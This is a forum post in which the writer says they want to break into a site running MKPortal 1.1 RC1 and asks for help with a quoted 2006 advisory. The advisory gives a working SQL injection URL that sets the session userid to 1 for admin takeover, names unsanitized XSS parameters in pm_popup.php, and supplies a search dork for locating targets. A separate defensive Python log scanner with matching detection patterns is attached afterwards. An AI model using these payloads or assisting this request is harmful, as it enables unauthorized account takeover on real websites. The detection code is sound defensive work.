Hello dear friends...
There is a site built with MKPortal 1.1 RC1... I searched for an exploit to break into it and found 2 things:
I tried to do something with http://[victim]/[mkportaldir]/index.php?ind=',userid='1 but couldn't...
PHP code:
Vendor: MKPortal (http://www.mkportal.it/)
Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)
About: Via this method a remote attacker can inject arbitrary SQL queries through the ind parameter in index.php of MKPortal.
Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at lines 35-37; as you can see, it is easy to
bypass this SQL update function.
Also there is a cross-site scripting vulnerability in pm_popup.php: the parameters u1, m1, m2, m3, m4 are not sanitized properly.
Level: Critical
---
How&Example:
SQL Injection :
GET -> http://[victim]/[mkportaldir]/index.php?ind=[SQL]
EXAMPLE -> http://[victim]/[mkportaldir]/index.php?ind=',userid='1
So with this example a remote attacker updates his session's userid to 1 and, after refreshing the page, he can log in as userid 1.
XSS:
GET -> http://[victim]/[mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
Click here and get exploit for this advisory
---
Dorks: "MKPortal 1.1 RC1"
I don't understand the second one either...
Could you please give a good and clear explanation?
Thank you...
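As an added example (not part of the post or the quoted advisory), here is a defender-side check: a Python scan of constructed Apache-style access-log lines that flags requests matching the two request patterns the advisory describes, an `ind` value on index.php carrying quote or SQL punctuation, and markup in the u1/m1..m4 parameters of includes/pm_popup.php. The log lines, client IPs and directory names are made up for the example.

```python
# Added example, not code from the post or from MKPortal: flag the two request
# patterns the MKPortal 1.1 RC1 advisory describes in web-server access logs.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in common log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2006:10:00:01 +0000] "GET /mkportal/index.php?ind=news HTTP/1.1" 200 5120
10.0.0.9 - - [21/Apr/2006:10:00:07 +0000] "GET /mkportal/index.php?ind=%27%2Cuserid%3D%271 HTTP/1.1" 200 5120
10.0.0.9 - - [21/Apr/2006:10:00:12 +0000] "GET /mkportal/includes/pm_popup.php?u1=%3Cb%3Ebold%3C%2Fb%3E&m1=hi HTTP/1.1" 200 800
10.0.0.7 - - [21/Apr/2006:10:00:20 +0000] "GET /mkportal/includes/pm_popup.php?u1=bob&m1=hello HTTP/1.1" 200 800
"""

# client ip, then the request target out of the quoted request line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
XSS_PARAMS = {"u1", "m1", "m2", "m3", "m4"}   # parameters named in the advisory

def classify(url):
    """Return 'sqli', 'xss' or None for one request path plus query string."""
    parts = urlsplit(url)
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)   # values are URL-decoded here
    if path.endswith("/index.php"):
        # Assumption: a legitimate ind value is a plain module name, so quotes,
        # semicolons, '=' or comment markers in it indicate the UPDATE injection.
        for value in params.get("ind", []):
            if re.search(r"['\";=]|--|/\*", value):
                return "sqli"
    if path.endswith("/includes/pm_popup.php"):
        for name in XSS_PARAMS:
            for value in params.get(name, []):
                if re.search(r"[<>]|javascript:", value, re.IGNORECASE):
                    return "xss"
    return None

def scan_log(text):
    """Return a list of (client_ip, finding, url) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        finding = classify(url)
        if finding:
            hits.append((ip, finding, url))
    return hits

if __name__ == "__main__":
    for ip, finding, url in scan_log(SAMPLE_LOG):
        print(f"{finding.upper():4} {ip} {url}")
```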